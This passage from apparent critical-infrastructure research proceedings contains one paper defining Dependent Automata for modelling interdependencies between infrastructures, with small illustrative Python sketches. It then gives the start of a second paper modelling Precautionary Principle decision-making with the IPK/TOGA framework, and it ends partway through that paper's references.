itself) from global effects (on other components). To be able to describe causes and effects we have placed our research in the context of automata; in particular, the formal setting we have devised consists of a network of automata: each infrastructure is modelled as a single automaton, and the whole system is described by the composition of the automata. For the time being, mainly for notational and conceptual simplicity, we concentrate on two infrastructures only. The states of the automata are labelled with sets of propositions, like, for example, up, down, failed, partially-failed, appropriately decorated to account for the severity of the state with respect to system functionalities. Transitions in the automata (edges) are decorated with actions. The change of state in one automaton has been enriched to model both endogenous causes (the action associated to the arc) and exogenous ones (a state transition in one automaton can depend on the state of another automaton, and/or can provoke a change of state in another automaton). This work has been developed in the context of the EEC-IST project CRUTIAL [1]: in the project, DA have been used to model the interdependencies of the Electrical and Information Infrastructures described in [11]. Although DA have been developed in the context of critical infrastructures, the formalism is more general, and we shall freely mix the terms infrastructures and systems.
2 Dependent Automata
We consider two systems, generically named A and B. We can classify the cause of a modification in a system as being either local(A), when a state transition in A depends on A only, or depend(A,B), when a state transition in A can depend on B being in a well-defined state. The effect provoked by a cause can be local (on A only) or global (on A and B). A separate case is synchronization, synch(A,B), when A and B evolve through the same common action: this may actually correspond to a real common action, or to a level of abstraction in which we do not want to state whether the action pertains to A or B, so that it is impossible to say. We have combined these behaviours in Table 1, to get the following classification (seen from A's viewpoint):

LC-LE LocalCause, LocalEffect: a change of state in A is triggered by an event of A itself, and its effect is confined to A;
LC-GE LocalCause, GlobalEffect: a change of state in A is triggered by an event of A itself, and its effect also provokes a change of state in B;
GSC-LE GlobalStateCause, LocalEffect: a change of state in A depends on the state of B, but its effect is confined to A;
GSC-GE GlobalStateCause, GlobalEffect: a change of state in A depends on the state of B, and its effect also provokes a change of state in B;
GA GlobalAction: there is an event that is common to the two infrastructures (or it is modelled as common to the two infrastructures).

Table 1. The cause-effect combinations

cause \ effect | local(A) | depend(A,B)
A only         | LC-LE    | LC-GE
A and B        | GSC-LE   | GSC-GE
synch(A,B)     | GA
We can now introduce Dependent Automata and their composition.

Definition 1. An automaton A, dependent upon the set of states SB of an automaton B, is defined by the tuple A = (SA, sA, EA, SEA, LA), where:
– SA is the non-empty and finite set of states;
– sA ∈ SA is the initial state;
– EA ⊆ SA × SA × ActA × P(SB × SB) is the set of edges (ActA is the set of actions of A, and P(SB × SB) is the power set over pairs of states of B);
– SEA: SA → [0, 1] is the severity function of states, with 1 being the greatest severity;
– LA: SA → P(APA) is the labelling of states over a set of symbols APA; LA is used to classify states into classes.

The set of actions ActA allows us to distinguish system events from changes of state, as the same action can be associated with more than one edge. We represent an arc from a state a to a state a' with action α and effect ef as (a) −α,ef→ (a'), where ef ∈ P(SB × SB) is called the "effect relationship", and from(ef) (to(ef)) is the set of states that appear as first (second) element in the pairs of ef. When considered in isolation, the arc (a) −α,ef→ (a') indicates that, upon action α, automaton A can move from a to a'. When considered in composition with B, it means that, upon action α, automaton A can move from a to a' if, at the same time, automaton B is in a state b ∈ from(ef); as a consequence of the change of state in A, B will also move from b to b', for (b, b') ∈ ef. This semantics "implements" a concept very similar to test&set: an action α of A can take place only if B is in a given state (test), and its realization modifies the state (set), that is to say, the value that has been tested. The formal semantics of a set of interacting dependent automata is defined through the composition operator ||, as follows.

Definition 2. Given two Dependent Automata A = (SA, sA, EA, SEA, LA), which depends on the set of states SB of an automaton B, and B = (SB, sB, EB, SEB, LB), which depends on the set of states SA of automaton A, we define the composition of the DA over the set Synch ⊆ ActA ∩ ActB as the automaton Sys = A ||Synch B, with Sys = (S, s, E, SE, L) and:
– S = SA × SB is the set of states;
– s = (sA, sB) is the initial state;
– E ⊆ S × S × Act, and there is an arc (a, b) −α→ (a', b') if
  • α ∉ Synch and ∃ (a) −α,ef→ (a') ∈ EA with (b, b') ∈ ef, OR
  • α ∉ Synch and ∃ (b) −α,ef→ (b') ∈ EB with (a, a') ∈ ef, OR
  • α ∈ Synch and ∃ (a) −α,∅→ (a') ∈ EA and ∃ (b) −α,∅→ (b') ∈ EB, where ∅ is the empty set;
– SE: S → [0, 1] with SE(a, b) = min{SEA(a), SEB(b)};
– L: S → P(APA) × P(APB), with L(a, b) = (LA(a), LB(b)).

Note that || is the parallel operator of Communicating Sequential Processes (CSP) [7] when α ∈ Synch, and it is an extended version of the interleaving composition of CSP, including the effects of one automaton (process in CSP) over another one, when α ∉ Synch.

DA make use of a single construct to express not only dependency, but also classical features of distributed systems like concurrent behaviour and non-determinism; indeed, in (a) −α,ef→ (a'):
– if ∃ [b, b'] ∈ ef and [b, b''] ∈ ef, with b' ≠ b'', then there is a non-deterministic effect of (a) −α,ef→ (a') over B;
– if ef is empty, A cannot evolve with α;
– if ef = Id, with Id = ∪_{b ∈ SB} [b, b], then A can evolve independently of B.
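To make the composition rule concrete, the following Python sketch builds the composed transition relation of Definition 2 from two edge sets. It is our own illustration, not part of any DA tool; an edge is encoded as (src, dst, action, ef), with ef a set of state pairs of the other automaton.

```python
# Illustrative sketch of Definition 2 (our own encoding, not the paper's
# tool). An edge of A is (src, dst, action, ef), where ef is the effect
# relationship: a set of state pairs of the *other* automaton B.

def compose(edges_a, edges_b, synch):
    """Return the arcs of Sys = A ||_Synch B as ((a, b), (a2, b2), action)."""
    arcs = set()
    # alpha not in Synch: A moves and drives B through ef (and symmetrically).
    for (a, a2, alpha, ef) in edges_a:
        if alpha not in synch:
            for (b, b2) in ef:
                arcs.add(((a, b), (a2, b2), alpha))
    for (b, b2, alpha, ef) in edges_b:
        if alpha not in synch:
            for (a, a2) in ef:
                arcs.add(((a, b), (a2, b2), alpha))
    # alpha in Synch: both automata move on the common action (empty effect).
    for (a, a2, alpha, ef_a) in edges_a:
        if alpha in synch and not ef_a:
            for (b, b2, beta, ef_b) in edges_b:
                if beta == alpha and not ef_b:
                    arcs.add(((a, b), (a2, b2), alpha))
    return arcs
```

Note how an effect equal to the Id relation (all pairs (b, b)) makes the first case degenerate into plain CSP-style interleaving, matching the remark above.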
As their name suggests, by default the behaviour of a DA depends upon the behaviour of the other automaton. To favour the definition of an automaton in isolation, that is to say when SB is unknown or may vary during the specification process, we can enrich the syntax of the effect relationship to allow for an Identity notation Id (pairs of equal states for any state of SB, even if SB is not fully known) and a Complement notation Compl, which adds identity pairs for all those elements of SB that are not included in from(ef). We can therefore extend the definition of effect as follows:

ef' = ef ∪ IdB   and   ef'' = ef ∪ ComplB(ef)

with
– IdB = ∪_{b ∈ SB} [b, b], and
– ComplB(ef) = {[b, b], ∀b such that no pair [b, b'] ∈ ef}, which can also be defined as ComplB(ef) = IdB \ (from(ef) × from(ef)).

The definitions are given in the context of A (so the effect is defined on the states of B), but the same applies to B. From a behavioural point of view, the integration of IdB into the effect of an arc from a to a' ensures that the automaton can take the arc independently of the state of the other automaton, while the integration of the Compl function ensures that the automaton can always follow the arc, but not necessarily in an independent manner. It is obvious that if ef is the empty set, then Compl = Id.

Figure 1 shows a small example of two DAs composed into a third one (with no synchronization action, so that the semantics is standard): in the figure, arcs have been numbered for ease of reference. Note the use of the notations Id and Compl and their consequences on the composition: action α on arc 1 can take place in the composition whenever the A component of the state is a, and it does not change the B component of the state (LC-LE type); action β on arc 2 instead can always take place when the A component of the state is a, but it may or may not change the state of B, depending on the state of B itself (LC-GE type); action δ on arc 3 can instead take place only if A is in state a, and as a consequence A moves to a' (GSC-GE type); while arc 4 of B can be taken only if A is in a' or a'', but not in a, and the state of A is left unchanged (GSC-LE).
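A minimal sketch of the two notations, continuing the Python illustration above (again our own names, offered only as a reading aid):

```python
# Id_B and Compl_B(ef) as plain set constructions (illustrative).

def id_rel(states_b):
    """Id_B: the identity pairs over every state of B."""
    return {(b, b) for b in states_b}

def compl(ef, states_b):
    """Compl_B(ef): identity pairs for those states of B that do not
    appear as the first element of any pair in ef (i.e. not in from(ef))."""
    from_ef = {b for (b, _) in ef}
    return {(b, b) for b in states_b if b not in from_ef}
```

Extending an effect with id_rel(SB) makes the arc independent of B, while extending it with compl(ef, SB) keeps the arc always enabled without erasing the explicit pairs already in ef.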
Fig. 1. Two DAs (left) and their composition (right)
3 Modelling Dependencies in the DA Model
Let us now discuss how the four combinations of local and global causes and effects given in Table 1 can be modelled in DA using the instrument of the effect relationship associated with the arcs. With reference to an arc of action α and effect ef in an automaton A that depends upon a set of states SB, we can observe that the arc describes a local cause if ef is a total relation (that is to say, from(ef) = SB): indeed the arc can be taken independently of the state of B. The arc describes instead a global cause if ef is not a total relation (from(ef) ⊂ SB), since it can be taken or not depending on the state of B. The arc represents a local effect if ef ⊆ Id (no change of state in B occurs), while it represents a global effect if not(ef ⊆ Id). When combining causes and effects we get four mutually exclusive classes, so each arc can be classified based solely on the value of the effect relationship ef, as summarized in Table 2, where α ∉ Synch; the arc is GA if α ∈ Synch. We get the following combinations:
– LC-LE: if α ∉ Synch and ef = Id;
– GSC-LE: if α ∉ Synch and ef ⊂ Id; indeed the automaton can follow the arc only if the other automaton is in a given subset of states, and the change of state induced by the arc has no effect on the other automaton;
– LC-GE: if α ∉ Synch, ef is a total relation and ef ≠ Id; indeed the automaton can take the arc independently of the state of the other automaton (since ef is a total relation), while the change of state induced by the arc has an effect on the other automaton (since ef is different from Id);
– GSC-GE: if α ∉ Synch, from(ef) ⊂ SB (ef is not a total relation) and ∃ [b, b'] ∈ ef with b' ≠ b;
– GA: if α ∈ Synch.

Table 2. The cause-effect behaviour based on the effect relationship ef

cause \ effect          | local(A): ef ⊆ Id | dependent(A,B): not(ef ⊆ Id)
A only: from(ef) = SB   | LC-LE: ef = Id    | LC-GE: from(ef) = SB and ∃[b, b'] ∈ ef, b' ≠ b
A and B: from(ef) ⊂ SB  | GSC-LE: ef ⊂ Id   | GSC-GE: from(ef) ⊂ SB and ∃[b, b'] ∈ ef, b' ≠ b
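The classification of Table 2 is mechanical, as the following continuation of the sketch shows; this is precisely the kind of per-arc check that, as anticipated in the conclusions, a graphical editor could perform automatically (again our own illustrative code):

```python
# Classify an arc by its action and effect relationship (Table 2).

def classify_arc(alpha, ef, states_b, synch):
    if alpha in synch:
        return "GA"
    local_effect = ef <= id_rel(states_b)                # ef subset of Id
    total_cause = {b for (b, _) in ef} == set(states_b)  # from(ef) = SB
    if total_cause:
        return "LC-LE" if local_effect else "LC-GE"
    return "GSC-LE" if local_effect else "GSC-GE"
```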
Finally, let us discuss why a new class of automata was needed, considering the richness of the formalisms already defined in the literature. Indeed, we could not find a formalism in which dependency is a primitive concept: many, like Statecharts [6], allow one event to cause an action and, in general, allow one automaton to modify a global variable and the other automaton to test the value of the variable, but the dependency is not direct, so no direct cause-effect relation can be explicitly represented. Statecharts as defined in UML do allow, through a complex chain of event, action and trigger modelling elements defined in the metamodel, a change of state in one state machine to change the state of another state machine, but, again, the relation is far from direct. The work in [16] proposes instead a formalism based on a structure of "occurrence nets" (a variant of Petri nets with concurrency but no choice), well suited to represent executions, and considers the problem of detecting, also using Petri net synthesis results, chains of faults, errors, and failures in an existing model (which may be the global model of one or more infrastructures). In this sense that approach is complementary to what this paper proposes.
4 Conclusion
In this paper Dependent Automata have been proposed as a reference model to classify dependencies in a formal setting. The technical report in [2] describes how cascading, escalating, and common-cause failures can be defined in a formal way. The same report shows an application to the case of the Electrical and Information Infrastructure models described in [11]. This example, nevertheless, does not constitute a sufficient assessment of the formalism, not only for the obvious reason that it is just a single case, but mainly because the infrastructure behaviour was already described using automata, therefore with the same state/transition approach to specification that we are considering. We shall continue the applicability study using the scenarios (descriptions of relevant behaviour) that have been defined in the CRUTIAL project ([1], final deliverable of Workpackage 1), and we plan to address scenarios that involve other infrastructures: a good starting point could be the work done inside IRRIIS [8] and other projects on critical infrastructure interdependencies. The implementation of a graphical interface for DA specification and composition has recently been completed inside the modelling framework DrawNET [4]. A useful feature of the implementation of DA that we plan for the future is to provide syntactic checking for arcs: the four types of arcs would be distinguished, for example using colours, and DrawNET could link to each arc a function that checks whether the effect relationship associated with the arc satisfies the constraints of Table 2.
References

1. CRUTIAL project (CRitical Utility InfrastructurAL Resilience, EEC project IST-FP6-STREP-027513), http://crutial.cesiricerca.it
2. Workpackage 2, Year 2 Final Deliverable of the CRUTIAL project, http://crutial.cesiricerca.it
3. Dobson, I., Carreras, B.A., Newman, D.E.: A probabilistic loading-dependent model of cascading failure and possible implications for blackouts. In: 36th Hawaii International Conference on System Sciences (HICSS-36), p. 65 (2003)
4. Gribaudo, M., Raiteri, D.C., Franceschinis, G.: Draw-Net, a customizable multiformalism, multi-solution tool for the quantitative evaluation of systems. In: QEST, pp. 257–258. IEEE Computer Society, Los Alamitos (2005)
5. Haimes, Y.Y., Jiang, P.: Leontief-based model of risk in complex interconnected infrastructures. Journal of Infrastructure Systems 7(1), 1–12 (2001)
6. Harel, D.: Statecharts: a visual formalism for complex systems. Science of Computer Programming 8(3), 231–274 (1987)
7. Hoare, C.A.R.: Communicating sequential processes. Communications of the ACM 21(8), 666–677 (1978)
8. IRRIIS project (Integrated Risk Reduction of Information-based Infrastructure Systems, EEC-IST project 027568), http://www.irriis.org
9. Interdependency Taxonomy and Interdependency Approaches, deliverable D2.2.1 of the IRRIIS project, http://www.irriis.org
10. Tools and Techniques for Interdependency Analysis, deliverable D2.2.2 of the IRRIIS project, http://www.irriis.org
11. Laprie, J.-C., Kanoun, K., Kaâniche, M.: Modelling interdependencies between the electricity and information infrastructures. In: Saglietti, F., Oster, N. (eds.) SAFECOMP 2007. LNCS, vol. 4680, pp. 54–67. Springer, Heidelberg (2007)
12. Little, R.G.: Toward more robust infrastructure: Observations on improving the resilience and reliability of critical systems. In: 36th Hawaii International Conference on System Sciences (HICSS-36), p. 58 (2003)
13. Nedic, D.P., Dobson, I., Kirschen, D.S., Carreras, B.A., Lynch, V.E.: Criticality in a cascading failure blackout model. In: 15th Power Systems Computation Conference (August 2005)
14. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependency Modelling: A Survey of U.S. and International Research. Idaho National Laboratory, Critical Infrastructure Protection Division (August 2006)
15. Performance Evaluation group of the University of Torino: The GreatSPN tool, http://www.di.unito.it/~greatspn
16. Randell, B., Koutny, M.: Failures: Their definition, modelling and analysis. In: Jones, C.B., Liu, Z., Woodcock, J. (eds.) ICTAC 2007. LNCS, vol. 4711, pp. 260–274. Springer, Heidelberg (2007)
17. Rinaldi, S.M., Peerenboom, J.P., Fisher, R.E., Kelly, T.K.: Studying the chain reaction. Electric Perspectives, 22–31 (January/February 2002)
18. Rinaldi, S.M., Peerenboom, J.P., Kelly, T.K.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Systems Magazine, 11–25 (December 2001)
19. Sforna, M., Delfanti, M.: Overview of the events and causes of the 2003 Italian blackout. In: IEEE Power Systems Conference and Exposition, PSCE, November 2006, pp. 301–308 (2006)
20. Tolone, W.J., Wilson, D., Raja, A., Xiang, W.-N., Hao, H., Phelps, S., Wray Johnson, E.: Critical infrastructure integration modeling and simulation. In: Chen, H., Moore, R., Zeng, D.D., Leavitt, J. (eds.) ISI 2004. LNCS, vol. 3073, pp. 214–225. Springer, Heidelberg (2004)
Application of IPK (Information, Preferences, Knowledge) Paradigm for the Modelling of Precautionary Principle Based Decision-Making

Adam Maria Gadomski1 and Tomasz Adam Zimny2

1 Interuniversity Centre ECONA and Italian Research Agency ENEA, Italy
2 Institute of Legal Studies, Polish Academy of Sciences, Poland, PhD candidate
Abstract. The aim of this article is the modelling of decision-making in which the Precautionary Principle (PP) is applied. Decisions are often made under time constraints and in lack of proper information, preferences or knowledge (IPK). Since the application of PP usually bears additional costs, it should be applied only when more efficient risk management policies are unavailable. The presented d-m framework based on the IPK conceptualization allows the identification of PP application criteria and models PP as a decisional rule, which is usually applied when a potential threat is recognized while the risk is not computable, or its assessment is not economically motivated. The proposed model uses the TOGA (Top-down Object-based Goal-oriented Approach) methodology as a modelling tool.
1 Introduction
Decision-making (d-m) is a complex process, particularly in the case of risk management. One of the important and extreme decisional rules applied in d-m is the Precautionary Principle (PP). In general, it advises taking measures aimed at avoiding or diminishing the negative effects of human-independent events or unintended consequences of human decisions when the probability of their occurrence, or their severity, is uncertain; that is, when the risk is not calculable (COMEST [3]). A socio-cognitive model of d-m under possible high-risk conditions and its components are important knowledge for managers, for coping with organization vulnerability, as well as for the designers of computerized decision-support systems. In the socio-cognitive engineering context (Gadomski [8]), this article is aimed at the modelling of Precautionary Principle (PP) application in complex managerial d-m during risk/emergency management. Although PP has been applied for many years, an approach to its definition was made only recently, and from a very intuitive legal point of view. PP started entering legal acts in the 1970s (COMEST [3]); since then it has been formulated both in law and in doctrine (Cranor [4]) in different versions. Recently, it has been described multiple times and often criticized (Peterson [17]); however, it has not yet been modelled from a cognitive systemic perspective. In this work, PP is seen as a directive in d-m reasoning. Decision-makers act also at a very high (political) level (Ezell [5]). However, the protection of infrastructure elements remains a responsibility of the organizations
that own them and of their employees (individual decision-makers) (Jones [16]). Risk management has to be part of the overall management of an organization (Haimes [13]). Some authors have stressed a need to improve understanding of the commonalities and differences between the various fields in which risks are managed (Haimes [14]). Since there are many versions of PP, as well as many legal approaches to the concept of risk itself, the main goal of this work was to propose a computational modelling framework describing when PP could be applied and the way of its domain-specific specialization. This task requires distinguishing the classes of situations where PP is suggested, and a sufficient formalization of the PP rule in the decisional context. The model is constructed using the Top-down Object-based Goal-oriented Approach (TOGA) meta-theory. The specific socio-cognitive property of this approach is the assumption of the perspective of a concrete intelligent agent (an individual or a group of intelligent beings) IA, which is involved in a given intervention-oriented d-m in a pre-selected domain of his/its activity D.
2 TOGA Modelling Framework and Main Concepts

2.1 The TOGA Meta-theory Assumptions
The TOGA meta-theory, as a meta-knowledge conceptualization tool, has been applied to knowledge ordering in several complex, interdisciplinary identification and specification problems (Gadomski [6]), (Gadomski et al. [10]), (Gadomski [7]), (Gadomski [9]). It is based on a set of top-axioms, modelling paradigms, top-models and a top-down goal-oriented methodology. In this work we need to integrate the identification and specification perspectives (where identification relates to existing objects and specification is focused on the design of not-yet-existing systems/processes) because, on the one hand, we recognize a real decisional situation and, on the other, we propose a concrete structured modelling process. The fundamental feature of TOGA is the assumption and application of a common conceptualization basis for the reciprocal comprehension of problem modellers. They may represent different branches, and their initial views on the same problem, non-congruent competences and interests may be essentially different, even when they have the same goal and a systemic terminological knowledge. Therefore this situation initially requires a basic consensus defined on a very high problem generalization level. In the next steps, TOGA allows us to zoom in and view various goal-oriented aspects of a problem in detail. On every layer the model has to be congruent and complete. Because of its top-down and goal-oriented approach, TOGA enables the incorporation of different local methodologies and specialized methods from psychology, sociology and artificial intelligence in the problem identification task. In this article we present only selected necessary properties of this conceptualization scheme.
2.2 Environment, Domain of Observation, Domain of Activity
The application of the TOGA approach begins from the top recognition of the couple (abstract intelligent agent (AIA), environment) and their interactions. The couple is called the intelligent agent world (IA world). Its components are successively decomposed and specialised for every given specific problem.

2.3 Information, Preferences, Knowledge
The generic reasoning function of an abstract intelligent agent (AIA) is called the Universal Reasoning Paradigm and is modelled by cognitive information processing founded on three key concepts: information, knowledge and preferences. They are well distinguished but relative (that is, AIA- and D-dependent), and have the properties of abstract objects. Information (I) is data which has a meaning and represents a specific property of a preselected domain of a human or artificial agent's activity. Knowledge (K) is every abstract property of a human/artificial agent which has the ability to process or transform (quantitatively/qualitatively) information into other information (for example, a model, procedure or instruction). Preferences (P) are ordering relations between two states of the domain of activity of the agent; they indicate the state with higher utility. Preference relations serve to establish an intervention goal of an agent and, in consequence, the choice of proper knowledge. The fundamental reasoning frame is constructed using independent object-based transformations related to the preselected domain of a possible intervention. On the meta-level, the preferences base PB and knowledge base KB from the domain level successively become the new domain of activity, where P and K are considered new I, and the same recursive operations can be repeated. The preferences can be represented as an oriented graph, and allow the agent to select his goals as the domain states with a maximum level of utility (= max. preference). Within the IA world, an agent can execute actions aimed at achieving goals. The achievement of a goal relies either on inducing a requested change within the agent's domain of interest, or on preventing certain changes. For example, in the case of LCCIs (Large Complex Critical Infrastructures) (Bologna [2]), the goal is usually to maintain a continuous supply of services (Bingham [1]); hence the agent's actions would usually be aimed at making sure that changes which would disturb the service-providing process do not occur. The request of an action which has to be aimed at achieving a goal is called a task.
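Read operationally, the three concepts admit a minimal typed sketch (our own illustrative Python; the names are not TOGA terminology):

```python
# Illustrative IPK skeleton (our own names, not TOGA terminology).
from typing import Any, Callable, Dict, Iterable

Information = Dict[str, Any]                        # meaningful domain data
Knowledge = Callable[[Information], Information]    # transforms I into other I
Preferences = Callable[[Information], float]        # utility ordering on states

def select_goal(states: Iterable[Information], p: Preferences) -> Information:
    """Pick the domain state of maximal utility (= max. preference)."""
    return max(states, key=p)
```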
3 Decisional Framework and PP Application Criteria
The Precautionary Principle is a specific rule which is used in d-m. In general, an action-oriented d-m is goal-oriented and can be represented as a situation recognition plus a decisional rule. In order to apply PP, the agent has to recognise a specific situation (S) as a situation requiring the application of PP (S^p) and perform a certain action (A), which will be a precautionary action (A^p). From
the perspective of the decision-maker, S^p recognition and A^p choice/elaboration are relative and depend on his I, P, K (that is, S^p depends on IPK and A^p depends on IPK) related to the IA world, i.e. to its components. Acquisition, evaluation and application of new IPK during d-m are essential activities for recognizing when and how PP should be used. Our objective is to recognise the classes of S and A characteristic of PP, i.e. those with attributes and values which are critical for the choice of PP. S^p and A^p relate to a concrete IA as a decision-maker and to his/its IPK related to a given domain of activity (see Gadomski, Zimny [11] for details).
4 Decomposition of Decision-Making Process
We decompose the generic d-m process using the general IPK framework, in order to determine where in its course PP may appear. Let us divide d-m into the following phases: reception of I, situation assessment, evaluation of I and K, and making a decision. A single branch of this scheme is presented in Fig. 1.

Reception of information about an event: If the agent does not perceive a possibility of occurrence of an event, no reaction to the alleged consequences of this event can occur. Reception of I about the event is presented at level 1 of Fig. 1. If the agent perceives a possibility of occurrence of an event, he can still be in a position of ignorance as to the consequences of the event and whether these consequences are tolerable or not. The I0 on the scheme denotes any new information the agent receives. Thus, the scheme can depict a situation in which no losses are generated (a neutral situation) as well as an emergency situation, where the emergency manager receives new I relevant to his situation.

Situation assessment: The situation assessment stage is presented at level 2 of Fig. 1 and in detail in Fig. 2. At this stage of d-m the agent uses his K to process newly gained and already possessed I. In order to model or assess risk to an infrastructure, the agent has to know the infrastructure's state variables (Haimes [15]). Here, the agent determines the current state of his domain and predicts its future states. This stage consists of the following sub-stages.

Processing of information with static model knowledge, acquisition of information about possible current domain states: The agent's I is transformed with model knowledge (mK), which results in information about his domain of interest. The accuracy and precision of the domain's description depend on the agent's IK. Also, since the agent may possess different models, he may get different domain descriptions.

Processing of information with dynamic model knowledge, acquisition of information about possible future domain states: At this stage the agent, basing on his mK and I, predicts what states his domain of observation will take. Depending on his situation, the agent can interpret this I in different ways or be unable to make predictions at all. After the agent has determined the alleged present and future states of his domain, he evaluates the possessed information.
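The branch just described can be rendered as a small pipeline over the IPK types sketched in Section 2 (our own simplified Python, where dynamic models are applied directly to the new information rather than to intermediate states):

```python
# One branch of the generic IPK-based d-m function (simplified sketch).

def assess_situation(i0, static_models, dynamic_models):
    """Level 2: possible current and future domain states from new I."""
    current = [mk(i0) for mk in static_models]
    future = [mk(i0) for mk in dynamic_models]
    return current, future

def dm_branch(i0, static_models, dynamic_models, p, tolerance):
    current, future = assess_situation(i0, static_models, dynamic_models)
    # Level 3: evaluate the content of I against the agent's preferences P.
    risky = [s for s in future if p(s) < tolerance]
    # Level 4: choose a risk-management strategy (PP is one candidate;
    # its applicability criterion is formalized in Section 5).
    return "manage_risk" if risky else "no_action"
```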
Fig. 1. Scheme of a single branch of generic IPK-based d-m function
Evaluation of possessed information and knowledge from the point of view of the agent's preferences: The next stages of d-m (Fig. 1, level 3) amount to the evaluation of the content of I and K about the expected event, and also to the evaluation of the quality and amount of I and K. These processes result in decisions about the application of protective measures, or in decisions aimed at the acquisition of additional I or K. This stage contains the following sub-stages.

Evaluation of the content of information: The agent's P indicates states of higher and lower utility. The agent compares the predicted states of his domain of interest with the states indicated by P. If a predicted state is below a certain level of the agent's tolerance, then an event that may cause this state is considered risky.

Evaluation of the amount of information: The amount of I received may be too small to identify a possible state of the domain of interest. Processing of such a set of I may result in omitting some of the possible consequences. The problem applies to the amount or quantity of possessed I. Whether the I and K are sufficient, the agent decides on the basis of his P. In particular, the agent does not need to gather the maximum amount of I available. Furthermore, in order to make a decision, the agent does not need to identify all the states of the domain in which losses are generated; usually it satisfies him that the class of unfavourable states is much bigger than the class of winning states.
Fig. 2. A detailed scheme of the situation assessment stage in decision-making (legend: I0 – new information obtained by the agent; Mns – static models used to process information; IMsnm – information obtained by processing information with static models; Mnd – dynamic models used to process information; IMdnm – information obtained by processing information with dynamic models)
Evaluation of the quality of knowledge and information: Apart from the amount of K and I, the agent also evaluates their quality. The data can be either significant or insignificant, and also reliable or unreliable: the first division applies to the content of the I or K, the latter to its source. The categories refer to classes of data at and above, or below, the level of the agent's acceptability. The same I or K can be accepted or rejected by the agent, depending on the source from which he obtained it. The evaluation of the amount and quality of I may take place even if the agent does not associate potential losses with an event that may occur. Since the precision and accuracy of the descriptions and predictions made by the agent depend on his IK, should he find his IK unsatisfactory, he may not be satisfied with a conclusion that the expected change does not bear risk. The IK evaluation stage is the first stage at which the agent can apply PP. This is a result of the formulations of PP, whose common denominator is an obligation to adopt measures aimed at risk mitigation in case of insufficient I or K about the threat. Hence, PP can only be applied if the agent recognises an event or decision as a potential threat and is not satisfied with the possessed K or I.

Making a decision on risk management strategy: This stage is presented at level 4 of Fig. 1. At this stage of d-m, the agent is able to determine whether the situation is an S^p situation and decide about A^p. The choice of A^p depends on several factors, such as the losses caused by the predicted event or their likelihood. Besides, it depends on the generalised, relative cost of the current A^p (such as the cost of postponing the decision and searching for new sources of IK, or of obtaining new IK from these sources). The costs have to be viewed from a socio-cognitive perspective. Depending on the level of d-m, these costs can encompass economic, political, ethical and cultural costs in the case of a legislator, or additionally costs connected with personal risk (physical, or legal, connected with sanctions for breaking the law) in the case of lower-level decision-makers. Generalised cost is assessed subjectively and from the spatial and temporal perspective of the decision-maker.
5 PP within the Proposed Model
PP is a decisional rule. Its application depends on the situation and on the performed or planned action. Not all expected domain changes cause the situation to become S^p. As follows from the most common formulations of PP, it can be applied within the described process at a relatively late stage. In order to carry out A^p, the agent has to recognise his situation S as S^p. This requires firstly performing a situation assessment and secondly evaluating the possessed IK. Because PP may be costly, also in terms of time, it should be applied only where it is impossible to apply more efficient strategies. Risk connected with an event depends on the magnitude of the expected loss and on the likelihood of that event or of a loss of a particular magnitude. In order to assess risk, the agent has to be able to assess both the loss and the likelihood. Hence, a class of situations requiring the application of PP can be identified. Situations in which possible losses and their likelihood are calculable do not require PP. PP is only to be applied when the probability of an event is not assessable and the expected losses are at least critical, or when the losses are not assessable and the likelihood is at least critical, or when both factors are not assessable (see the sketch below). In other situations the agent either applies a different risk management strategy or refrains from making decisions (e.g. when the expected loss or likelihood is less than critical).

PP application has its specificity. A decision about carrying out A^p has to be taken in the context of possibilities, since it usually carries additional costs. In order to apply PP, the agent usually has to utilise means he has in reserve (time, human resources, monetary means, etc.). Different examples of A can be A^p even in the same situation. Even in very similar situations, different ways of applying PP will prove appropriate. The decision depends particularly on the agent's I about available resources. Besides, whether a given A is A^p depends on the agent's IK. The same decision can be regarded as an example of applying PP or of applying a different management strategy, depending on the situation (e.g. whether the risk is assessable) (see Gadomski, Zimny [11] for details).

A precautionary approach has to be taken also within legislation. The agent requires a proper normative and organizational framework (a proper set of P and an efficient flow of I and K). Such a framework influences decisions made by multiple agents at multiple layers. An improper legal framework can strongly contribute to loss increase. Rules set at different levels should allow: quick response to changes in the domain, efficient communication between different participants of d-m, clear distribution of competencies and responsibilities, proper resources management (including K and I management), and identification of the main goals and of the hierarchy between them. For example, this factor can be very important in the case of Large, Complex, Critical Infrastructures (LCCI), where the large number of services, provided in complex and not always foreseen circumstances, requires continuous decisions of various subjects, on various layers (Bingham [1]), and also under time constraints. Human organizations and their staff's d-m can be the most vulnerable element of the whole managerial process; they require complex and difficult-to-design strategies for coping with malfunctions, and often they rely on decision support systems (Snediker et al. [18]).
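The PP applicability criterion stated above reduces to a small decision rule. The sketch below is our own rendering; the numeric threshold and the use of None for "not assessable" are assumptions, not the authors' notation:

```python
# Illustrative encoding of the PP applicability criterion of Section 5.
CRITICAL = 0.8  # assumed threshold on a normalized severity/likelihood scale

def pp_applies(loss, likelihood):
    """loss and likelihood are values in [0, 1], or None if not assessable."""
    if loss is None and likelihood is None:
        return True                      # both factors not assessable
    if likelihood is None:
        return loss >= CRITICAL          # probability not assessable
    if loss is None:
        return likelihood >= CRITICAL    # losses not assessable
    return False  # both calculable: apply an ordinary risk-management strategy
```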
PP may often be used wrongly, and its application may lead to undesired results (Hahn et al. [12]). Paradoxically, the most important precautionary measure in the management of risk in many fields (e.g. LCCIs) may be narrowing the field for PP application at the low-level decision-maker level as much as possible. This has to be done at a higher (legislative) level. The main goal of the authors was to propose a computational modelling framework describing when PP should be applied and the way of its domain-specific specialization. The d-m scheme we proposed allows the development of a computer program which could be used to simulate, with limited precision, decision-makers' behaviour. Such a program could support already existing LCCI simulators. Also, it could be used to develop the most efficient PP application policy for particular domains of activity. The presented study has a preliminary character. It has been performed in the frame of the research and development projects: EU IRRIIS (Integrated Risk Reduction of Information-based Infrastructure Systems), the Italian national project CRESCO (Centro computazionale di RicErca sui Sistemi COmplessi; subproject: Socio-Cognitive Modelling for Complex Socio-Technological Networks), and ENEA's project on the vulnerability of technological and energy networks.
References

1. Bingham, J.: Security and Safety in Large Complex Critical Infrastructures (2002) (March 15, 2008), www.cs.kent.ac.uk/~people/~staff/~rdl~EDCC-4/~Presentations/bighamSlides.pdf
2. Bologna, S., et al.: Dependability and Survivability in Large Complex Critical Infrastructures. In: Anderson, S., Felici, M., Littlewood, B. (eds.) SAFECOMP 2003. LNCS, vol. 2788, pp. 342–353. Springer, Heidelberg (2003)
